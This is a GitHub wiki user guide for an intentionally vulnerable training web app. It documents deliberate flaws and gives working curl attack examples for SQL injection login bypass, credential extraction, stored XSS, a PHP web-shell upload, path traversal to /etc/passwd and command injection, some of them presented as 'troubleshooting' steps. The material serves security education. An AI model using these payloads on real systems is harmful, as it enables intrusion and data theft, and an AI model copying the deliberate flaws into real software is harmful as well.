User Guide - capstone-hermes/hermes-fullstack GitHub Wiki

User Guide

Overview

The Weak Website is a social posting application that allows users to create accounts, share posts, upload files, and interact with various features. This guide covers all user-facing functionality from both normal user and security testing perspectives.

🚨 Security Notice

This application intentionally contains security vulnerabilities for educational purposes.

  • Use only in isolated, controlled environments
  • Never deploy on public or production systems
  • Avoid using real personal information

User Roles and Access Levels

Anonymous Users

Capabilities:

  • View landing page and security information
  • Browse public post feed
  • Access file upload functionality
  • Register for new account
  • Login to existing account

Limitations:

  • Cannot create posts
  • Cannot access protected areas
  • No profile management

Registered Users

Capabilities:

  • All anonymous user features
  • Create and manage posts
  • Access personal dashboard
  • Upload and download files
  • Change account password
  • View user profile

Limitations:

  • Cannot access other users' private data (without exploitation)
  • No administrative functions

Admin Users

Capabilities:

  • All registered user features
  • Administrative access (if implemented)
  • Enhanced system information

Application Features

1. Landing Page (/)

Purpose: Introduction to the application and navigation hub

Features:

  • Application overview and description
  • Security warning and educational notice
  • Quick navigation to key features
  • Links to registration and login

Security Considerations:

  • Contains educational warnings about vulnerabilities
  • Safe entry point for security testing

2. User Registration (/signup)

Purpose: Create new user accounts

Required Information:

  • Email address (used as username)
  • Password (subject to weak validation)

Process:

  1. Navigate to signup page
  2. Enter email and password
  3. Submit form
  4. Account created (vulnerable to injection)

Password Requirements:

  • Minimum 6 characters, maximum 20 characters
  • Must contain uppercase, lowercase, numbers, and special characters
  • ASCII characters only (vulnerability: non-ASCII rejection)
  • Password truncated at 20 characters (vulnerability)

Testing Scenarios:

# Normal registration
curl -X POST http://localhost:8080/auth/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"Password123!"}'

# SQL injection in email
curl -X POST http://localhost:8080/auth/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]'\'',(SELECT '\''password'\'','\''admin'\''))--","password":"ignored"}'

3. User Authentication (/login)

Purpose: Authenticate existing users

Process:

  1. Enter email and password
  2. Submit credentials
  3. Receive JWT token
  4. Redirected to dashboard

Authentication Flow:

  • Credentials sent to /auth/login
  • Server validates using raw SQL (vulnerable)
  • JWT token generated with hardcoded secret
  • Token stored in browser localStorage

Security Issues:

  • SQL injection in authentication
  • Credentials logged in plain text
  • Weak JWT secret (hardcoded-secret)

Testing Examples:

# Normal login
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"password123"}'

# Authentication bypass
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\''--","password":"anything"}'

4. User Dashboard (/dashboard)

Purpose: Main interface for authenticated users

Features:

  • Post creation form
  • Recent activity summary
  • Quick navigation to other features
  • User profile information

Post Creation:

  • Text content input (no length limit)
  • No content sanitization
  • Direct storage to database
  • Immediate display in public feed

Security Testing:

# Create normal post
curl -X POST http://localhost:8080/posts/create \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{"content":"Hello world!"}'

# XSS payload in post
curl -X POST http://localhost:8080/posts/create \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{"content":"<script>alert('\''XSS'\'')</script>"}'

5. Public Feed (/feed)

Purpose: Display all user posts

Features:

  • Chronological post display
  • User attribution for each post
  • No pagination (performance issue)
  • Real-time content rendering

Security Risks:

  • Stored XSS execution
  • No content filtering
  • Raw HTML rendering

Content Display:

// Vulnerable rendering (actual code)
<div dangerouslySetInnerHTML={{ __html: post.content }} />

6. File Upload System (/file-upload)

Purpose: Allow users to share files

Upload Process:

  1. Select file from local system
  2. Submit via multipart form
  3. File stored in /uploads directory
  4. Direct filesystem access available

File Handling:

  • No file type restrictions
  • No file size limits (up to 1GB)
  • Original filename preserved
  • No virus scanning

Vulnerable Endpoints:

  • /file/upload - Unrestricted upload
  • /file/download/:filename - Direct file access
  • /file/retrieve?path= - Path traversal
  • /file/execute - Command injection

Testing Examples:

# Upload PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST http://localhost:8080/file/upload -F "[email protected]"

# Path traversal
curl "http://localhost:8080/file/retrieve?path=../../../../etc/passwd"

# Command injection
curl -X POST http://localhost:8080/file/execute \
  -H "Content-Type: application/json" \
  -d '{"command":"whoami"}'

7. Password Management (/change-password)

Purpose: Allow users to update passwords

Current Status: Permanently Disabled

Intended Process:

  1. Enter current password
  2. Enter new password
  3. Confirm new password
  4. Submit form

Implementation Issues:

  • Password change always fails (vulnerability V2.1.5)
  • No current password verification (vulnerability V2.1.6)
  • Same weak validation as registration

Testing:

curl -X POST http://localhost:8080/auth/change-password \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{"currentPassword":"old","newPassword":"new123!"}'

# Always returns error: "Password change functionality is permanently disabled"

8. Security Information (/security-info)

Purpose: Educational documentation about vulnerabilities

Content:

  • OWASP ASVS mapping
  • Vulnerability explanations
  • Educational disclaimers
  • Testing guidance

Features:

  • Static informational content
  • Safe for all users to access
  • No interactive functionality

User Workflows

New User Registration Workflow

  1. Landing Page → Navigate to application
  2. Registration → Create new account 
    Email: [email protected]
Password: SecurePass123!
  3. Login → Authenticate with credentials
  4. Dashboard → Access protected features
  5. Explore → Try posting, file upload, etc.

Content Creation Workflow

  1. Login → Authenticate to system
  2. Dashboard → Access post creation
  3. Create Post → Enter content (vulnerable to XSS)
  4. Submit → Store in database
  5. View Feed → See post in public feed
  6. XSS Execution → Malicious scripts run for all viewers

File Sharing Workflow

  1. File Upload Page → Navigate to upload interface
  2. Select File → Choose any file type
  3. Upload → Submit to server (no restrictions)
  4. Storage → File saved with original name
  5. Access → Direct URL access to uploaded files
  6. Exploitation → Execute uploaded web shells

Security Testing Workflow

  1. Reconnaissance → Map application features
  2. Authentication Testing → Test login/signup vulnerabilities
  3. Input Validation → Test XSS and injection points
  4. File Upload Testing → Test upload restrictions
  5. Path Traversal → Test file access controls
  6. Command Injection → Test system command execution
  7. Documentation → Record findings and impacts

API Usage Guide

Authentication API

Login

POST /auth/login
Content-Type: application/json

{
  "email": "[email protected]",
  "password": "password123"
}

# Response
{
  "token": "eyJhbGciOiJIUzI1NiIs..."
}

Registration

POST /auth/signup
Content-Type: application/json

{
  "email": "[email protected]", 
  "password": "Password123!"
}

# Response
{
  "message": "User created successfully"
}

Posts API

Create Post

POST /posts/create
Authorization: Bearer <token>
Content-Type: application/json

{
  "content": "Hello world!"
}

Get All Posts

GET /posts/all

# Response
[
  {
    "id": 1,
    "content": "Hello world!",
    "userId": 1,
    "userEmail": "[email protected]",
    "createdAt": "2024-01-01T12:00:00.000Z"
  }
]

File API

Upload File

POST /file/upload
Content-Type: multipart/form-data

file: <binary file data>

# Response
{
  "originalname": "document.pdf",
  "filename": "document.pdf", 
  "path": "uploads/document.pdf"
}

Download File

GET /file/download/:filename

# Direct file download

File Retrieval (Path Traversal)

GET /file/retrieve?path=<file_path>

# Returns file contents as text

Browser Interface Guide

Navigation Structure

Header Navigation:
├── Home (/)
├── Feed (/feed)  
├── Login (/login)
├── Signup (/signup)
└── Security Info (/security-info)

Authenticated Navigation:
├── Dashboard (/dashboard)
├── Change Password (/change-password)
└── File Upload (/file-upload)

Form Validation

Client-side Validation (Minimal)

  • Email format validation
  • Required field checking
  • Basic password length check

Server-side Validation (Intentionally Weak)

  • No input sanitization
  • Raw SQL query construction
  • No XSS protection

Error Handling

User-facing Errors

  • Generic "Invalid credentials" messages
  • Form validation errors
  • File upload status messages

Security-relevant Errors

  • SQL error details exposed
  • Stack traces in responses
  • Detailed path information
  • System configuration details

Mobile and Responsive Design

Device Support

  • Desktop: Full functionality on modern browsers
  • Tablet: Responsive layout with touch support
  • Mobile: Mobile-optimized interface

Browser Compatibility

  • Chrome 90+: Full support
  • Firefox 88+: Full support
  • Safari 14+: Full support
  • Edge 90+: Full support

Accessibility

  • Basic keyboard navigation
  • Screen reader compatibility
  • High contrast support

Data Management

User Data Storage

  • Passwords: Stored in plain text (vulnerability)
  • Email: Unique constraint enforced
  • Posts: No content filtering or sanitization
  • Files: Direct filesystem storage

Data Export/Import

  • No built-in export functionality
  • Direct database access via SQL injection
  • File system access via path traversal

Data Retention

  • No automatic cleanup
  • Manual file management required
  • Database grows without limits

Performance Considerations

Known Limitations

  • No pagination on post feed
  • Large file uploads allowed (1GB)
  • No query optimization
  • No caching mechanisms

Resource Usage

  • High memory usage for large files
  • CPU intensive for malicious uploads
  • Network bandwidth uncontrolled

Troubleshooting Common Issues

Login Problems

# Check if user exists
curl "http://localhost:8080/file/retrieve?path=../../../server/logs/app.log"

# Verify credentials via SQL injection
curl -X POST http://localhost:8080/auth/login \
  -d '{"email":"'\'' UNION SELECT email,password,null,null FROM user--","password":"test"}'

File Upload Issues

# Check upload directory permissions
curl -X POST http://localhost:8080/file/execute \
  -d '{"command":"ls -la uploads/"}'

# Verify file was uploaded
curl "http://localhost:8080/uploads/filename.ext"

XSS Not Executing

  • Verify JavaScript is enabled
  • Check browser console for errors
  • Try different payload formats
  • Ensure content is displayed in feed

SQL Injection Not Working

  • Check quote escaping
  • Try different comment syntax (-- vs #)
  • Verify SQL syntax for MySQL
  • Check application logs for errors

Next Steps:

Related Documentation:

⚠️ **GitHub.com Fallback** ⚠️